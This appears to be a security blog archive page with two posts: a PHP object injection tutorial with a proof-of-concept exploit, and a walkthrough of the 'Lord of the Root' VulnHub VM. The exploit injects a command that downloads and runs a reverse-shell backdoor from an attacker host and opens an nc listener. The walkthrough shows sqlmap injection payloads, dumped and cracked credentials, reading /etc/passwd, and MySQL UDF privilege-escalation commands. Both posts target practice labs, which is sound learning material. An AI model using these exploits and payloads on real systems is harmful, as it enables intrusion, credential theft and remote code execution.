exploitation Archives - XeroSecurity

Exploiting PHP Serialization/Object Injection Vulnerabilities

This is a short blog post on exploiting PHP Serialization/Object Injection vulnerabilities in order to gain remote shell access to the host. For more information on PHP serialization, go here: https://www.owasp.org/index.php/PHP_Object_Injection. If you would like to test this yourself, there are some great resources available, such as: XVWA (https://github.com/s4n7h0/xvwa) and Kevgir (https://canyoupwn.me/kevgir-vulnerable-vm/).

Detect

The first step in the exploitation process is to detect the presence of PHP serialization in the application we are testing. To assist, we can use SuperSerial for Burpsuite which can be downloaded here: https://www.directdefense.com/superserial-java-deserialization-burp-extension/ (see below). This will passively detect the presence of PHP and Java serialization in the application we’re testing.

Analyze

Now that we’ve detected PHP serialization in the application, we can confirm if remote code execution is possible by analyzing the source code for the application (if available…). As seen below, the important thing to note is that serialized objects are taken from the “r” parameter ($var1=unserialize($_REQUEST[‘r’]);) and unserialized and eval’ed (eval($this->inject);), then displayed via (echo “< br/>”.$var1[0].” – “.$var1[1];). Given this, code execution appears to be possible if we pass PHP serialized objects to the “r” parameter! 🙂

< ?php 
    error_reporting(E_ALL);
    class PHPObjectInjection{
        public $inject;

        function __construct(){

        }

        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
    if(isset($_REQUEST['r'])){  

        $var1=unserialize($_REQUEST['r']);
        

        if(is_array($var1)){ 
            echo "
".$var1[0]." - ".$var1[1];
        }
    }else{
        echo "parameter is missing";
    }
? >

Exploit

To exploit this flaw, we can create a simple PHP script to generate our PHP serialized payload automatically and run whatever commands we want on the remote host. In this case, I chose to create a versatile reverse shell via PHP using this script (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz). NOTE: You will need to host this file on your web server and update the local IP and port in the reverse shell script as well as update the below exploit code to point to your server…

< ?php 
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com

A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 

Shouts to @jstnkndy @yappare for the assist!

NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/

print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');

class PHPObjectInjection
{
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
   public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");

? >

Demo

Now that our exploit is ready, we can execute it to get a nice reverse shell on the remote host for full remote command execution! Shout to @jstnkndy @yappare for the assist! -1N3

April 15, 2016 xer0dayz Exploits & PoC's, Hacking Tutorials, Uncategorized No comments yet

VulnHub: Lord of the Root Solution

Greetingz! This is a quick and dirty solution for the Lord of the Root boot-to-root VM challenge. Enjoy! -1N3

DOWNLOAD

https://www.vulnhub.com/entry/lord-of-the-root-101,129/

DISCOVERY

# netdiscover -r 192.168.1.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                  
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 282                                                                                       
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.1.101   00:0c:29:8c:bd:7b    01    042   VMware, Inc.

ENUMERATION

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN

Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST
Nmap scan report for 192.168.1.101
Host is up (0.00026s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST
Nmap scan report for 192.168.1.101
Host is up (0.00025s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds

SSH BANNER

Since our only open port was SSH, I decided to ssh and see what options or hints were available…

[email protected]:~# ssh 192.168.1.101

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3

PORT KNOCKING

As the SSH banner hints at, it seems that we would need to use port knocking in order to unlock any other hidden services running on the target.

[email protected]:/pentest/loot# knock 192.168.1.101 1 2 3

[email protected]:/pentest/loot# sniper 192.168.1.101
[3;J
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN

Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST
Nmap scan report for 192.168.1.101
Host is up (0.00020s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds

INTERESTING RESPONSE

Now that we have an open Apache server listening on 1337/tcp, I quickly discovered an interesting response in the 404 pages..

HTTP/1.1 404 Not Found
Date: Sat, 16 Jan 2016 00:01:17 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: "74-51ffd64576fc7"
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

< html>
< img src="/images/hipster.jpg" align="middle">
< !--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
< /html>

DECODED MESSAGE

It seemed strange to have an encoded message in the HTML comments of the 404 page so I knew this was a hint and could likely be decoded. Sure enough, it appeared to be a double-encoded base64 string.

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh = Lzk3ODM0NTIxMC9pbmRleC5waHA= 

Lzk3ODM0NTIxMC9pbmRleC5waHA= = /978345210/index.php

LOGIN PAGE

Now that we decoded a message that seems to be reveal a hidden login page, the next obvious step was to either try some form of SQLi or auth bypass or brute force method to get further…

POST /978345210/index.php HTTP/1.1
Host: 192.168.1.101:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101:1337/978345210/index.php
Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

username=user&password=pass&submit=+Login+

HTTP/1.1 200 OK
Date: Fri, 15 Jan 2016 23:37:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html

< !DOCTYPE html>
< html>
< head>
< title>LOTR Login!< /title>
< /head>
< body>
< div id="main">
< h1>Welcome to the Gates of Mordor< /h1>
< div id="login">
< form action="" method="post">
< label>User :< /label>
< input id="name" name="username" placeholder="username" type="text">< br>
< label>Password :< /label>
< input id="password" name="password" placeholder="**********" type="password">
< br>
< input name="submit" type="submit" value=" Login ">
< span>Username or Password is invalid< /span>
< /form>
< /div>
< /div>
< /body>
< /html>

SQL INJECTION VULNERABILITY

Scanning with Burpsuite quickly revealed that the login for was vulnerable to SQL injection.

SQL INJECTION EXPLOITATION

Using SQLMap, we can dig into the DB and see what else we can find.

[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:09:48

[19:09:48] [INFO] testing connection to the target URL
[19:09:48] [INFO] heuristics detected web page charset 'ascii'
[19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:09:48] [INFO] testing if the target URL is stable
[19:09:49] [INFO] target URL is stable
[19:09:49] [INFO] testing if POST parameter 'username' is dynamic
[19:09:49] [WARNING] POST parameter 'username' does not appear dynamic
[19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[19:09:49] [INFO] testing for SQL injection on POST parameter 'username'
[19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns
[19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login 
---
[19:13:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101'

[*] shutting down at 19:13:04





[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:14:15

[19:14:16] [INFO] resuming back-end DBMS 'mysql' 
[19:14:16] [INFO] testing connection to the target URL
[19:14:16] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login 
---
[19:14:18] [INFO] the back-end DBMS is MySQL
[19:14:18] [INFO] fetching banner
[19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                                                                                                
[19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:14:39] [INFO] adjusting time delay to 1 second due to good response times
5.5.44-0ubuntu0.14.04.1
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner:    '5.5.44-0ubuntu0.14.04.1'
[19:16:13] [INFO] fetching current user
[19:16:13] [INFO] retrieved: [email protected]
current user:    '[email protected]'
[19:17:23] [INFO] fetching current database
[19:17:23] [INFO] retrieved: Webapp
current database:    'Webapp'
[19:17:50] [INFO] fetching server hostname
[19:17:50] [INFO] retrieved: LordOfTheRoot
hostname:    'LordOfTheRoot'
[19:18:50] [INFO] testing if current user is DBA
[19:18:50] [INFO] fetching current user
current user is DBA:    True
[19:18:51] [INFO] fetching database users
[19:18:51] [INFO] fetching number of database users
[19:18:51] [INFO] retrieved: 5
[19:18:53] [INFO] retrieved: 'root'@'localhost'
[19:20:16] [INFO] retrieved: 'root'@'lordoftheroot'
[19:22:01] [INFO] retrieved: 'root'@'127.0.0.1'
[19:23:18] [INFO] retrieved: 'root'@'::1'
[19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'

[19:26:15] [INFO] fetching database users password hashes
[19:26:15] [INFO] fetching database users
[19:26:15] [INFO] fetching number of password hashes for user 'root'
[19:26:15] [INFO] retrieved: 1
[19:26:17] [INFO] fetching password hashes for user 'root'
[19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
[19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[19:28:32] [INFO] retrieved: 1
[19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint'
[19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:31:32] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:31:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:31:38] [INFO] starting 8 processes 
[19:31:40] [INFO] cracked password 'darkshadow' for user 'root'                        
database management system users password hashes:                                                                                                                                                                                      
[*] debian-sys-maint [1]:
    password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
    password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
    clear-text password: darkshadow

[19:35:14] [INFO] fetching database users privileges
[19:35:14] [INFO] fetching database users
[21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:23] [INFO] retrieved: 3
[21:13:27] [INFO] retrieved: id
[21:13:37] [INFO] retrieved: username
[21:14:14] [INFO] retrieved: password
[21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] retrieved: 5
[21:14:59] [INFO] retrieved: 1
[21:15:03] [INFO] retrieved: iwilltakethering
[21:16:23] [INFO] retrieved: frodo
[21:16:51] [INFO] retrieved: 2
[21:16:55] [INFO] retrieved: MyPreciousR00t
[21:18:05] [INFO] retrieved: smeagol
[21:18:39] [INFO] retrieved: 3
[21:18:44] [INFO] retrieved: AndMySword
[21:19:32] [INFO] retrieved: aragorn
[21:20:05] [INFO] retrieved: 4
[21:20:10] [INFO] retrieved: AndMyBow
[21:20:45] [INFO] retrieved: legolas
[21:21:20] [INFO] retrieved: 5
[21:21:24] [INFO] retrieved: AndMyAxe
[21:21:57] [INFO] retrieved: gimli
[21:22:20] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

[21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'

SSH LOGIN

Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…

[email protected]:~# ssh [email protected]

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
[email protected]:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
[email protected]:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
[email protected]:~$ sudo su
[sudo] password for smeagol: 
smeagol is not in the sudoers file.  This incident will be reported.


[email protected]:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
[email protected]:~$

MYSQL USER DEFINED FUNCTIONS PRIVILEGE ESCALATION

Now that we have a full SSH shell to the target, the next route to root is privilege escalation. Since I had the local root password from the SQL DB and a full SSH shell, I decided the quickest way would be to use a user-defined function via the MySQL UDF exploit.

gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p


use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
